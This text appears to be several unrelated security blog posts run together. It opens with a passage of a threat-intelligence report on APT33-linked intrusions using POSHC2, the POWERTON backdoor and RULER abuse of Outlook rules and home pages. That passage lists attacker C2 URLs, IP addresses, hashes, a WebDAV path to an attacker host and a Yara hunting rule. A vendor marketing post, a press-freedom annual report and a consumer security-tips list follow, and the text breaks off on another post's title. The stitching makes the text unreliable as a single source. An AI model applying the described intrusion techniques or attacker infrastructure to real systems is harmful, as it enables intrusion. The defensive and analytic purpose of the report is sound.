Figure 3 shows that the actor made some minor changes, such as encoding the PowerShell "DownloadString" commands and renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download the POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file dropped to decode and execute the POSHC2 variant also changed to “Vision.ps1”. During this August 2018 activity, the POSHC2 variants were configured with a “kill date” of Aug. 13, 2018. Note that POSHC2 supports a kill date in order to guardrail an intrusion by time; this functionality is built into the framework.
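The kill-date guardrail amounts to a date comparison at execution time: past the configured date, the implant simply refuses to operate. A minimal sketch of the concept, using the August 2018 kill date observed here:

```python
from datetime import datetime

# Kill date configured in the August 2018 POSHC2 variants described above.
KILL_DATE = datetime(2018, 8, 13)

def should_run(now: datetime, kill_date: datetime = KILL_DATE) -> bool:
    """POSHC2-style guardrail: do not operate once the kill date has passed,
    limiting how long a stray implant stays active if an operation ends."""
    return now < kill_date

print(should_run(datetime(2018, 8, 7)))   # during the intrusion window → True
print(should_run(datetime(2018, 8, 14)))  # after the kill date → False
```

For defenders, a recovered kill date is useful: it brackets the window in which the operators expected the intrusion to be live.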

Once again, POSHC2 was used to download a new variant of POWERTON (MD5: c38069d0bc79acdc28af3820c1123e53), configured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed.

Due to Managed Defense’s early containment of these intrusions, we were unable to ascertain the actor’s motivations; however, it was clear they were adamant about gaining and maintaining access to the victim’s network.

Adversary Pursuit: Infrastructure Monitoring

Advanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at scale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16 and Oct. 11, 2018. On at least Oct. 11, 2018, the adversary changed the payload (MD5: 8be06571e915ae3f76901d52068e3498) to download and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info (MD5: 4047e238bbcec147f8b97d849ef40ce5). This specific URL was identified in a public discussion as possibly related to recent destructive attacks. We are unable to independently verify this correlation with any organic information we possess.

On Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5: f0fe6e9dde998907af76d91ba8f68a05). The payload was crafted to download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: 53ae59ed03fa5df3bf738bc0775a91d9).

Table 1 contains the operational timeline for the activity we analyzed.




2017-08-15 17:06:59 | APT33 – EMPIRE (Used)
2017-09-15 16:49:59 | APT33 – PUPYRAT (Compiled)
2017-11-12 20:42:43 | GroupA – AUT2EXE Downloader (Compiled)
2017-11-14 14:55:14 | GroupA – PUPYRAT (Used)
2018-01-09 19:15:16 | APT33 – PUPYRAT (Compiled)
2018-02-13 13:35:06 | APT33 – PUPYRAT (Used)
2018-05-09 18:28:43 | GroupB – AUT2EXE (Compiled)
2018-07-02 07:57:40 | APT33 – POSHC2 (Used)
2018-07-16 00:33:01 | GroupB – POSHC2 (Compiled)
2018-07-16 01:39:58 | GroupB – POSHC2 (Used)
2018-07-16 08:36:13 | GroupB – POWERTON (Used)
2018-07-31 22:09:25 | APT33 – POSHC2 (Used)
2018-08-06 16:27:05 | GroupB – POSHC2 (Compiled)
2018-08-07 05:10:05 | GroupB – POSHC2 (Used)
2018-08-29 18:14:18 | APT33 – POSHC2 (Used)
2018-10-09 16:02:55 | APT33 – POSHC2 (Used)
2018-10-09 16:48:09 | APT33 – POSHC2 (Used)
2018-10-11 21:29:22 | GroupB – POWERTON (Used)
2018-12-13 11:00:00 | GroupB – POWERTON (Identified)

Table 1: Operational Timeline

Outlook and Implications

If the activities observed during these intrusions are linked to APT33, it would suggest that APT33 has likely maintained proprietary capabilities we had not previously observed until sustained pressure from Managed Defense forced their use. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production.

We will continue to track these clusters independently until we achieve high confidence that they are the same. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Managed Defense has the privilege of being exposed to intrusion activity every day across a wide spectrum of industries and adversaries. This daily front line experience is backed by Advanced Practices, FireEye Labs Advanced Reverse Engineering (FLARE), and FireEye Intelligence to give our clients every advantage they can have against sophisticated adversaries. We welcome additional original source information we can evaluate to confirm or refute our analytical judgements on attribution.

Custom Backdoor: POWERTON

POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including WMI and an auto-run registry key. Communications with the C2 are over TCP/HTTP(S) and leverage AES encryption for traffic to and from the C2. POWERTON is typically deployed as a later-stage backdoor and is obfuscated with several layers.

FireEye has witnessed at least two separate versions of POWERTON, tracked separately as POWERTON.v1 and POWERTON.v2, wherein the latter has improved its command and control functionality, and integrated the ability to dump password hashes.

Table 2 contains samples of POWERTON.

Hash of Obfuscated File (MD5) | Hash of Deobfuscated File (MD5)

Table 2: POWERTON malware samples

Adversary Methods: Email Exploitation on the Rise

Outlook and Exchange are nearly synonymous with email access. User convenience is a primary driver behind technological advancements, but convenient access for users often reveals additional attack surface for adversaries. As organizations expose any email server access to the public internet for their users, those systems become intrusion vectors. FireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and Office 365. Our Mandiant consultants also presented several new methods used by adversaries to subvert multifactor authentication at FireEye Cyber Defense Summit 2018.

At FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. A plausible scenario for exploitation of this vector is as follows.

An adversary has a single pair of valid credentials for a user within your organization, obtained through any means, including the following non-exhaustive examples:

  • Third party breaches where your users have re-used credentials; does your enterprise leverage a naming standard for email addresses such as first.last@yourorganization.tld? It is possible that a user within your organization has a personal email address with a first and last name--and an affiliated password--compromised in a third-party breach somewhere. Did they re-use that password?
  • Previous compromise within your organization where credentials were compromised but not identified or reset.
  • Poor password choice or password security policies resulting in brute-forced credentials.
  • Gathering of crackable password hashes from various other sources, such as NTLM hashes gathered via documents intended to phish them from users.
  • Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet.

Once the adversary has legitimate credentials, they identify publicly accessible Outlook Web Access (OWA) or Office 365 that is not protected with multi-factor authentication. The adversary leverages the stolen credentials and a tool like RULER to deliver exploits through Exchange’s legitimate features.
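From the defender's side, the password-spray step that preceded the RULER activity tends to leave a distinctive pattern in authentication logs: failures spread across many distinct accounts from few sources, rather than many failures against one account. A hypothetical detection sketch; the event schema and threshold are assumptions, not any FireEye product logic:

```python
from collections import defaultdict

def detect_password_spray(events, user_threshold=10):
    """Flag source IPs with failed logins against many distinct accounts,
    the low-and-slow pattern of a password spray. Illustrative heuristic
    only; tune the threshold to your environment's baseline."""
    users_by_source = defaultdict(set)
    for source_ip, username, success in events:
        if not success:
            users_by_source[source_ip].add(username)
    return [ip for ip, users in users_by_source.items()
            if len(users) >= user_threshold]

# Synthetic events: (source_ip, username, login_succeeded)
events = [("203.0.113.5", "user%02d" % i, False) for i in range(12)]
events += [("198.51.100.7", "alice", False), ("198.51.100.7", "alice", False)]
print(detect_password_spray(events))  # → ['203.0.113.5']
```

Pairing an alert like this with multi-factor authentication on OWA and Office 365 removes most of the value the adversary gets from a successful spray.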

RULER In-The-Wild: Here, There, and Everywhere

SensePost’s RULER is a tool designed to interact with Exchange servers via a messaging application programming interface (MAPI), or via remote procedure calls (RPC), both over HTTP protocol. As detailed in the "Managed Defense Rapid Responses" section, in mid-November 2017, FireEye witnessed network activity generated by an existing Outlook email client process on a single host, indicating connection via Web Distributed Authoring and Versioning (WebDAV) to an adversary-controlled IP address 85.206.161[.]214. This communication retrieved an executable created with Aut2Exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f), and executed a PowerShell one-liner to retrieve further malicious content.

Without the requisite logging from the impacted mailbox, we can still assess that this activity was the result of a malicious mail rule created using the aforementioned tooling for the following reasons:

  • Outlook.exe directly requested the malicious executable hosted at the adversary IP address over WebDAV. This is unexpected unless some feature of Outlook directly was exploited; traditional vectors like phishing would show a process ancestry where Outlook spawned a child process of an Office product, Acrobat, or something similar. Process injection would imply prior malicious code execution on the host, which evidence did not support.
  • The transfer of 95f3bea43338addc1ad951cd2d42eb6f was over WebDAV. RULER facilitates this by exposing a simple WebDAV server, and a command line module for creating a client-side mail rule to point at that WebDAV hosted payload.
  • The choice of WebDAV for this initial transfer of the stager is the result of restrictions in mail rule creation; the payload must be "locally" accessible before the rule can be saved, meaning protocol handlers for something like HTTP or FTP are not permitted. This is thoroughly detailed in Silent Break Security's initial write-up prior to RULER’s creation. This leaves SMB and WebDAV via UNC file pathing as the available options for transferring a malicious payload via an Outlook rule. WebDAV is likely the less alerting option from a networking perspective, as one is more likely to find WebDAV transactions occurring over ports 80 and 443 to the internet than to find a domain-joined host communicating via SMB to a non-domain-joined host at an arbitrary IP address.
  • The payload to be executed via Outlook client-side mail rule must contain no arguments, which is likely why a compiled Aut2exe executable was chosen. 95f3bea43338addc1ad951cd2d42eb6f does nothing but execute a PowerShell one-liner to retrieve additional malicious content for execution. However, execution of this command natively using an Outlook rule was not possible due to this limitation.

With that in mind, the initial infection vector is illustrated in Figure 4.

Figure 4: Initial infection vector
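The process-ancestry reasoning above can be condensed into a simple triage heuristic. A hypothetical sketch over assumed telemetry fields (process name, protocol, requested URL); real detection logic would of course consider far more context:

```python
def suspicious_outlook_fetch(process: str, protocol: str, url: str) -> bool:
    """Triage heuristic from the analysis above: Outlook itself requesting
    an executable over WebDAV, with no intermediate child process such as
    an Office app or Acrobat, is unexpected and merits investigation."""
    return (
        process.lower() == "outlook.exe"
        and protocol.upper() == "WEBDAV"
        and url.lower().endswith(".exe")
    )

# The mid-November 2017 activity described above would match this shape:
print(suspicious_outlook_fetch(
    "outlook.exe", "WebDAV",
    "\\\\85.206.161.214@443\\outlook\\live.exe"))  # → True
```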

As both attackers and defenders continue to explore email security, publicly-released techniques and exploits are quickly adopted. SensePost's identification and responsible disclosure of CVE-2017-11774 was no different. For an excellent description of abusing Outlook's home page for shell and persistence from an attacker’s perspective, refer to SensePost's blog.

FireEye has observed and documented an uptick in several malicious attackers' usage of this specific home page exploitation technique. Based on our experience, this particular method may be more successful due to defenders misinterpreting artifacts and focusing on incorrect mitigations. This is understandable, as some defenders may first learn of successful CVE-2017-11774 exploitation when observing Outlook spawning processes resulting in malicious code execution. When this observation is combined with standalone forensic artifacts that may look similar to malicious HTML Application (.hta) attachments, the evidence may be misinterpreted as initial infection via a phishing email. This incorrect assumption overlooks the fact that attackers require valid credentials to deploy CVE-2017-11774, and thus the scope of the compromise may be greater than individual users' Outlook clients where home page persistence is discovered. To assist defenders, we're including a Yara rule to differentiate these Outlook home page payloads at the end of this post.

Understanding this nuance further highlights the exposure to this technique when combined with password spraying as documented with this attacker, and underscores the importance of layered email security defenses, including multi-factor authentication and patch management. We recommend that organizations reduce their email attack surface as much as possible. Of note, organizations that choose to host their email with a cloud service provider must still ensure the software clients used to access that server are patched. Beyond implementing multi-factor authentication for Outlook 365/Exchange access, the Microsoft security updates in Table 3 will assist in mitigating known and documented attack vectors that are exposed for exploitation by toolkits such as SensePost’s RULER.

Microsoft Outlook Security Update

RULER Module Addressed

June 13, 2017 Security Update


September 12, 2017 Security Update


October 10, 2017 Security Update


Table 3: Outlook attack surface mitigations

Detecting the Techniques

FireEye detected this activity across our platform, including named detection for POSHC2, PUPYRAT, and POWERTON. Table 4 contains several specific detection names that applied to the email exploitation and initial infection activity.



Endpoint Security


Network and Email Security

HackTool.RULER (Network Traffic)

Table 4: FireEye product detections

For organizations interested in hunting for Outlook home page shell and persistence, we’ve included a Yara rule that can also be used for context to differentiate these payloads from other scripts:

rule Hunting_Outlook_Homepage_Shell_and_Persistence
{
    meta:
        author = "Nick Carr (@itsreallynick)"
        reference_hash = "506fe019d48ff23fac8ae3b6dd754f6e"
    strings:
        $script_1 = "<htm" ascii nocase wide
        $script_2 = "<script" ascii nocase wide
        $viewctl1_a = "ViewCtl1" ascii nocase wide
        $viewctl1_b = "0006F063-0000-0000-C000-000000000046" ascii wide
        $viewctl1_c = ".OutlookApplication" ascii nocase wide
    condition:
        uint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*)
}


The authors would like to thank Matt Berninger for providing data science support for attribution augmentation projects, Omar Sardar (FLARE) for reverse engineering POWERTON, and Joseph Reyes (FireEye Labs) for continued comprehensive Outlook client exploitation product coverage.

Carnegie Mellon’s Software Engineering Institute Report Shows Efficacy of Static Application Security Testing

A new report from Carnegie Mellon University’s Software Engineering Institute shows that automated, integrated static analysis improves software quality, reduces development time, and makes software more reliable and secure. By incorporating application security testing throughout the entirety of the Software Development Lifecycle (SDLC), organizations can ensure the security and quality of their software while increasing speed-to-market.

The findings stand in support of what our own data and customer practices have shown. In the State of Software Security Volume 9, analysis of Veracode’s application testing data found that development teams that implemented DevSecOps practices fixed flaws 11.5 times faster than typical organizations. While Nichols’ report does not include vendor comparisons, it does provide an overall analysis of the benefits of a secure development approach.

Development teams at three organizations were observed, with each team using both static code analysis (SCA) and static binary analysis (SBA). The teams each used these tools at different times in the SDLC, across multiple and varying projects. The study found that applying the tools added no additional effort for development teams prior to release, and that as developers sharpened their secure coding skills, false positive rates declined with cleaner code. It further recommends that organizations build and automate static testing into their workflows across the SDLC, and continue to apply human analysis to testing results to ensure quality.

Three Must-Have Solutions to Kick-Off Your Application Security Program

Building and maturing an application security program might seem like a daunting project, but getting started is simpler than you think. There is an established series of steps most organizations take when developing their programs. Here are the three solutions we recommend to get you started in securing your business-critical applications:

1. Veracode Greenlight: Deliver applications faster and meet your development timelines by writing secure code the first time around. Veracode Greenlight, an IDE- or CI-integrated continuous flaw feedback and secure coding education solution, returns scans in seconds, which helps developers discern whether their code is secure. This solution helps teams maintain development velocity, reduce the number of flaws introduced into an application, and strengthen secure coding skills and practices. Learn more.

2. Static Analysis: Veracode static analysis enables you to quickly identify and remediate application security flaws at scale and with efficiency. Our SaaS-based platform integrates with development and security tools to make testing a seamless part of your process. Once flaws are identified, teams can leverage in-line remediation advice and one-to-one coaching to reduce mean time to resolve. Learn more.

3. Software Composition Analysis: While the report found that SAST wasn’t the strongest solution for reducing the risk of open source components, modern software composition analysis is. Today, applications are more often assembled from other sources, and in a typical application, we’re seeing some comprised of up to 90 percent third-party code. Veracode’s SCA uses machine learning and natural language processing to identify potential vulnerabilities in open source libraries with a high level of accuracy. By understanding the status of the components within an application, and whether a vulnerable method is being called, organizations can prioritize fixes based on the riskiest use of components and maintain their speed-to-market. Learn more.

Applications continue to be one of the top attack vectors for malicious actors, and while there is no application security silver bullet, we can help you implement automated techniques and manual processes to ensure that your applications are secure. To start creating more secure software today and learn more about how our solutions can help drive down application risk in your organization, contact us.

Freedom of the Press Foundation Releases its 2018 Annual Report

For anyone who cares about press freedom rights, it’s been a concerning year. In the United States, the president attacks journalists as “enemies of the people” on a weekly basis. Leak investigations targeting whistleblowers are at an all-time high. Journalists have been arrested and physically attacked covering protests at alarming rates. Abroad, the number of journalists being jailed is unprecedented.

But there is also reason to hope.

At Freedom of the Press Foundation, we are at the forefront of all these issues. While there are certainly a lot of battles ahead, it’s our job to equip journalists to face ever-changing threats in the 21st Century. While they face increasing dangers, they’ve also never been better prepared to handle them.

Help us sustain this important work with a donation by clicking here!

Without our supporters, our donors, and the brave journalists and whistleblowers who put their lives on the line, none of this would be possible.

We’re going to fight harder than ever in the coming year, and with your support, the public’s right to know will be stronger than ever.

Here are a few highlights of what we accomplished in 2018:

SecureDrop: Over 75 major news organizations in the U.S. and abroad have installed SecureDrop, our open source whistleblower submission system. It has become a vital tool for outlets holding the Trump administration to account and getting vital information to the public.

Digital Security Trainings: Our digital security training team has conducted over 60 digital security trainings with media organizations, journalists, and documentary filmmakers, training over 1,200 journalists to better protect themselves online this year alone.

The U.S. Press Freedom Tracker: Since the launch of the U.S. Press Freedom Tracker in late 2017, FPF has documented 220 press freedom violations involving journalists and reporters.

Encryption Tools: Haven, an Android app that acts as a security system, has been downloaded over 500,000 times since its release.

Secure the News: News websites have an increasing obligation to protect the security and privacy of their readers, as well as their journalists and sources. Secure The News tracks the adoption of HTTPS encryption across major news websites and encourages them to adopt security practices that will protect journalists and readers alike. 86% of major news organizations now use HTTPS encryption by default, thanks to this advocacy campaign.

Archive the News: After Gothamist and DNAinfo were abruptly shut down, we built an open-source software tool enabling journalists to protect their work by saving an entire archive of their portfolios. In 2018, we created over 52,000 PDFs of articles for working journalists to include in their archives and writing portfolios.

The role of journalism in our democracy matters now more than ever and we are grateful for your support of our important work. Below is our complete annual report, outlining our projects and programs, highlights of the year, and expansion plans for 2019.

10+ Cyber Security Decisions You (and Me) Will Regret in The Future [Updated]

We may not realize it, but our daily routine habits have long-term effects. Some of them are positive, others negative, but there is always at least one lesson to be learned. If you choose to eat healthily on a regular basis, this habit will surely shape your lifestyle for years to come. If you read only a few pages of one book every day, you’ll see the world from different angles, enrich your vocabulary, and better understand people and the world we live in.

This applies to cybersecurity (decisions) as well. Let’s say that “within every decision comes great responsibility.” The daily habits we practice in the digital landscape can greatly impact our future. If you are like me, you probably want to know that all your valuable digital assets, such as photos, work-related documents and files, apps, and emails, are in a safe and secure place.

I really hope you don’t have the widespread “It can’t happen to me” mindset and assume you can’t become a victim. Cybercriminals don’t target only large organizations or institutions; everyone is exposed and can be vulnerable to all kinds of cyber attacks. It is wrong to think otherwise. We should take precautions to better secure our online identity.

With wise security choices come no regrets.

Did you know a recent report found that cyber attacks are among the top three risks to society, along with natural disasters and extreme weather?


You shouldn’t be surprised! The digital landscape doesn’t provide safety as we’d want it to, or as we think it should (the “security by default” mentality). There are online threats behind every click we make, and we need to think seriously about our online behavior. It is essential to adjust our habits so that we can become our own layer of protection.

Don’t expose yourself and your valuable data, and don’t make security choices you’ll regret in the upcoming years. Learn how to be resilient and easily detect online threats.

Apply these actionable security tips to enjoy safer digital experiences

  1. Do not share too much personal information on the Internet, because you can expose yourself to identity theft and imposter scams. For security reasons, it is better not to give out full information such as your birth date, address, city of birth, or phone number, not to share your location when you are on vacation, and not to reveal other sensitive personal details that could expose your data.
  2. You may not realize it, but each time you check in at home, at the airport, at a restaurant, or at any other public place, you become an easy target for malicious hackers. Once you expose your current location, attackers may learn you’re on vacation and target your home. For security and privacy reasons, do not share your current location, and provide as little information as possible about it while on the go.
  3. Also, don’t share photos of your credit card details on social channels, because hackers can find ways to gain access to your financial accounts. Food for thought: read these stories of people who shared images of their credit cards on Twitter or Instagram. You can easily get ripped off. “Sharing a picture online of your credit/debit card is a surefire way to have your details hacked.”
  4. Make sure that you don’t reveal your passwords to other people. Not even to your best friend or family members! A password is the key to all the sensitive data stored in your email or other online accounts. The same applies to the working environment. You never know: an insider threat could be sitting next to you and could easily access your company’s sensitive data. Make sure you lock your computer each time you leave your desk.
  5. We highly recommend changing your passwords regularly and setting strong, unique passwords for your online accounts. Use this password guide to manage your passwords like an expert.
  6. Be careful when accepting random friend requests on Facebook from people you don’t know. You may be targeted by online scammers who collect data about users through fake Facebook profiles. If one of your friends sends you a suspicious link, don’t click it, because it may redirect you to a malicious site and infect your PC with malware.
  7. Most spam campaigns take place via email, so we strongly advise you not to click or download any attached file or document that looks suspicious. Online criminals will always find innovative methods (like spoofing) to steal users’ sensitive data. Here’s how online scams work and how you can easily detect them.
  8. Don’t post private conversations without asking for permission in advance. Social media is a great place to interact and work with others, but many of us still have trouble understanding how to use these platforms properly. Follow these specific netiquette rules. Remember that all messages you post on Facebook or other social media channels will remain there forever, because these platforms store and collect data, and they might affect you at some point. Always check your privacy and security settings for every social media platform you use, and think twice about how much data you want to make publicly accessible versus keep private.
  9. When you browse the Internet and search for something specific, you are not completely safe, and you can infect your PC with malware or other online threats. Every browser has vulnerabilities that need to be fixed, so it is important to keep your browser up to date at all times and apply all available patches. The same applies to your plugins, add-ons, and operating system. This step-by-step guide will show you how to get solid browser security.
  10. Education is always the key to staying safe and protected online, so we strongly encourage you to stay informed and learn from free educational resources.

We thought it might be useful to compile a list of 10 security decisions that can have an impact on your future. These decisions can harm us more than we realize, so read them carefully. 🙂

Later edit: The list isn’t complete and we’ll keep updating it with more useful recommendations about security decisions that impact our lives.

Decision 1: Allowing someone else to dictate your security priorities

Here’s a piece of friendly advice: don’t let someone else tell you how to prioritize your security problems! Make sure you understand your own needs, and decide which security measures to follow in order to enhance your online protection.

When it comes to cybersecurity priorities, it’s better (and wiser) not to rely on everyone who shares their views and opinions on digital safety. Do not be influenced by someone who tells you how to approach security matters. Instead, think of your own security challenges and prioritize them to better protect your valuable online assets.

Decision 2: Not focusing on educating yourself about cybersecurity

Probably one of the best investments for each of us is education. I sincerely believe that cybersecurity education is our best weapon to fight against today’s wave of cyber attacks. Education should be our core belief and main concern in keeping our valuable assets secure.

Cybersecurity education is the key to unlocking a safer future and minimizing the impact of cyber security incidents. Make sure you spend more time and effort learning as much as possible about the cybersecurity environment.

Why? Because the most successful cyber attacks aren’t just about technology; they are tied to human error.

If you don’t know where to begin your learning path, have a look at these free educational resources that apply to anyone, no matter the background or skills level.

Decision 3: Reading cybersecurity resources with no actionable insights (myself included)

What’s the point of reading cyber security resources online if you don’t apply the information found there? I know that a quick search on Google turns up lots of blogs and websites in this field. The big challenge comes when you need to filter out and choose the valuable resources that can teach us actionable things.

I think we should start with a simple idea: your reading should be useful and actionable all the way through the journey in cybersecurity. You need it. We all need it. More than that, it’s essential to be ready for the future.

“Practical application of what you read reinforces what you’ve learned because you’re forced to integrate it into your life. If all you do is consume, you’re much more likely to forget what you read,” said Srinivas Rao on Medium.

As the author says, reading things we don’t actually apply leads us to a “vicious cycle of excessive consumption which limits the creativity and prevents you from consuming less and creating more.”

If you want to read actionable cybersecurity resources, we’ve curated a list of Internet blogs and websites that could help you become savvier in info security.

Also, we asked security experts about books, and they’ve recommended some of the best educational cybersecurity books out there to read.

Decision 4: Not thinking about the security implications of our devices

After purchasing a device, whether desktop or mobile, we don’t think too much about all the security implications. We are probably too excited about the cool features (and apps) included, and we miss this part.

We expose ourselves and our data, becoming more vulnerable to cyber attacks and prone to malware infection.

Everyone (myself included) believes that security comes by default, and we don’t take the time to check all the existing settings.

I learned how my security decisions have a great impact on my future.

Here are some hands-on and actionable guides you may want to read for keeping your devices safe:

Smartphone security guide

Windows 10 Security Guide

How to Protect your PC with Multiple Layers of Protection

Decision 5: Not paying enough attention to the security software you install

When you look for a security software program, you’ll probably choose based on a recommendation from friends and family. This is a wise decision that shows you care about your data. It is essential to add an extra layer of security to lower the risk of seeing your files and documents stolen by hackers.

Depending on your budget, you could choose free or paid security software to protect your digital assets. Also, make sure you pay enough attention to the product you install, so you don’t have regrets afterward.

Why? Because in general we install software products on our devices with a few clicks, and that’s it. We forget about them. What we often fail to do is:

  • Check for all the necessary system requirements;
  • Change default passwords;
  • Choose carefully and invest in quality, legitimate products;
  • Check for built-in apps and all the software package included.

Security programs are usually packed with modules that constantly check for updates. Some have an auto-update feature built in, while others require you to update manually. I recommend performing these updates, as they deliver fixes for major security vulnerabilities along with new and improved features.

Here’s what security experts say about the importance of software patching and why it’s an essential factor in your online safety. Cultivate the healthy habit of checking for and installing updates as part of your daily digital routine.

Also, remember that the longer your devices run without updates, the more exposed you are to data leakage and other cybersecurity threats.

Decision 6: Postponing data backups

I am sure you’re as concerned about your data as I am, but postponing the backup of all your critical data is a choice we might regret in the future.

The longer we postpone this action, the more our data is vulnerable to attacks and prone to be lost unexpectedly. That’s why it is essential to have a copy of all your valuable data on external sources like a hard drive or in the cloud (Google Drive or Dropbox).

Here are the golden rules of data backup you should follow right now:

1. Keep at least 2 copies of your data.

2. Have backups on different external devices.

3. Maintain a constant, automated backup schedule of your files and documents.

4. Secure your backups with strong passwords and keep those passwords safe.

Therefore, for people like you and me, who can’t really spare that much time when it comes to backing up data, here’s a simple and actionable guide to follow.

Several security solutions offer backups for your computer data, and many of them will do this automatically and periodically. You can also create your own backups (and it won’t hurt to have multiple backups anyway). Just be disciplined in making sure you regularly do the backups so that if something should happen, the minimum amount of data is lost.
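The golden rules above are easy to automate. Here is a minimal, hypothetical sketch (the paths and date-stamped naming scheme are my own assumptions, not a specific product's behavior) that archives a folder to two or more destinations, covering rules 1-3:

```python
import datetime
import pathlib
import shutil

def backup(source, destinations):
    """Archive `source` once per destination, named with today's date."""
    stamp = datetime.date.today().isoformat()
    copies = []
    for dest in destinations:
        pathlib.Path(dest).mkdir(parents=True, exist_ok=True)
        # make_archive returns the full path of the .zip it created
        copies.append(shutil.make_archive(
            str(pathlib.Path(dest) / ("backup-" + stamp)), "zip", source))
    return copies
```

Run on a schedule (cron, Task Scheduler), this gives you the "constant, automated" part; pointing the destinations at different physical drives or a synced cloud folder covers the "different external devices" rule.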

Decision 7: Not using two-factor authentication

A Google software engineer said during a security conference that less than 10 percent of active Google accounts use two-step authentication to enhance the protection of their accounts.

You may not give it too much importance now, but its main purpose is to make malicious actors’ life harder and reduce potential fraud risks. It will make it more difficult for cybercriminals to breach your account.

There’s nothing wrong with finding new technologies difficult to understand. What’s wrong is ignoring or postponing them, because that will affect your online safety in the long run.

Three main reasons why you should activate two-factor authentication (2FA):

  • Passwords on their own aren’t as powerful as we believe they are, and they can’t fully protect us. Cyber attackers have the power to try billions of password combinations and crack weak ones quickly.
  • People tend to use the same password on different accounts, and when online criminals succeed in cracking it (via a brute force attack), all your data will be exposed. Don’t do it! Set unique, strong passwords and consider using a password manager tool.
  • 2FA offers an extra layer of security and reduces cybercriminals’ chances to launch an attack. It’s hard for them to get through the second authentication factor.
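To put the first point in numbers, here is a back-of-the-envelope illustration (not a real attack model, just raw combinatorics) of how the brute-force search space grows with password length and character-set size:

```python
# Illustrative only: the raw number of guesses an attacker would need
# to exhaust when brute-forcing a password of a given length drawn
# from a given alphabet.
def search_space(alphabet_size, length):
    return alphabet_size ** length

weak = search_space(26, 8)     # 8 lowercase letters: ~2.1e11 guesses
strong = search_space(62, 12)  # 12 letters + digits: ~3.2e21 guesses
```

The 12-character mixed password has roughly ten billion times the search space of the 8-character lowercase one, which is why length and character variety matter far more than clever substitutions.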

Enabling two-factor authentication is a must for all your email accounts, social media accounts, apps, and online banking accounts. You can use this step-by-step guide to help you activate it for various online accounts. As for passwords, do not reuse them across different online accounts.

Decision 8: Sharing too much personal information on social media

This is one of those security decisions you will definitely regret in the future. For privacy reasons, do not share your full personal data (birth date, address, city of birth, phone number, or any other details) on social accounts.

This way, you expose yourself to identity theft and most likely become more vulnerable to all types of online scams. Cybercriminals use social engineering techniques to exploit your data and gain quick access to it.

Nothing beats learning from personal experience, but sometimes it’s better to learn from others’ experiences than to have a negative one yourself. These true Internet stories could inspire you to take cyber security very seriously. Also, it doesn’t hurt to be a little paranoid and protect your digital assets as if everyone wants them.

Decision 9: Connecting to unprotected Wi-Fi networks

It is no news that Wi-Fi networks come with a set of security issues, allowing malicious hackers to use Wi-Fi sniffers and other methods to intercept almost all of your data (such as emails, passwords, addresses, browsing history, and even credit card data).

Before I started working in cybersecurity, I used to connect to every public, free Wi-Fi network when visiting a coffee shop or restaurant. I have learned not to do this anymore.

I realized (and understood) the security risks to which I was exposing myself and all my data by relying on these Wi-Fi networks. Now I turn Wi-Fi off :-).

This is one of those security decisions you’ll regret one day, so do your best to avoid Wi-Fi networks that don’t offer password-protected, encrypted connections. Cybercriminals can hack into a public Wi-Fi network, just like this 7-year-old kid did.

To be extra safe on public Wi-Fi, make sure you:

  • Visit and use only secure websites with the HTTPS protocol while browsing the Internet and, mostly, while doing various banking operations.
  • Consider using a Virtual Private Network (VPN) and block malicious actors’ attempt to access sensitive data sent over the unsecured Wi-Fi network.
  • Keep your operating system up to date and patch everything.
  • Do not connect to a public Wi-Fi network without having antivirus software installed on your device.

Decision 10: Giving up on cybersecurity because it seems too complicated

For many of us, cybersecurity seems way too technical and difficult to approach, and for this reason, many users give up on understanding even the basics of cybersecurity.

It gets confusing for regular users, but also for business owners, journalists, or people working or involved in cybersecurity. At some point, all parties involved think “why can’t security be simpler?”

“Cybersecurity is complicated because life is complicated and there is no perfection. We can’t be a hundred percent secure – so the rhetoric and fear monger of vendors and security professionals has given in to a feeling of helplessness and disparity among the 80%,” said Ian Thornton-Trump in an expert roundup.

Decision 11: Not checking for reliable and trustworthy (re)sources

We live in a world where we are overwhelmed with information from every social network. We consume and have access to so much free content that it gets difficult (and challenging) to distinguish between fake and real news.

While fake news is nothing new, disinformation can play a significant role in spreading and creating a fake reality that people (will) believe in. 

Every time we look for something and do research on a specific topic, the information is right there, one click away. But how many of us are willing to go through the process of filtering and checking data? How do you know if it comes from trusted, high-quality sources?

PRO TIP: We strongly recommend always fact-checking against other resources and never relying solely on the first (re)source you find. Here are some useful tips that provide actionable information on how to better spot fake news. It is also important to combat fake news through user education, high-quality journalism, and always double-checking other resources.

Each of us should be more aware of the long-term consequences of fake news, combat it, and invest in education to learn how to better detect disinformation.

You can easily tackle this by attending a (free) cybersecurity course for beginners that will teach you how to improve your online safety. Once again, I emphasize the importance of education, which can protect digital lives.

The more proactive our cybersecurity defense is, the safer we’ll be on the Internet and the better we can combat the alarming wave of online threats. Cybercriminals never cease to surprise us with the various methods they use in their cyber attacks.

Are any of these security decisions on your list? What key factors influence your security decision-making? We are curious to know what you think, so feel free to share your thoughts.

The post 10+ Cyber Security Decisions You (and Me) Will Regret in The Future [Updated] appeared first on Heimdal Security Blog.

The bleak picture of two-factor authentication adoption in the wild

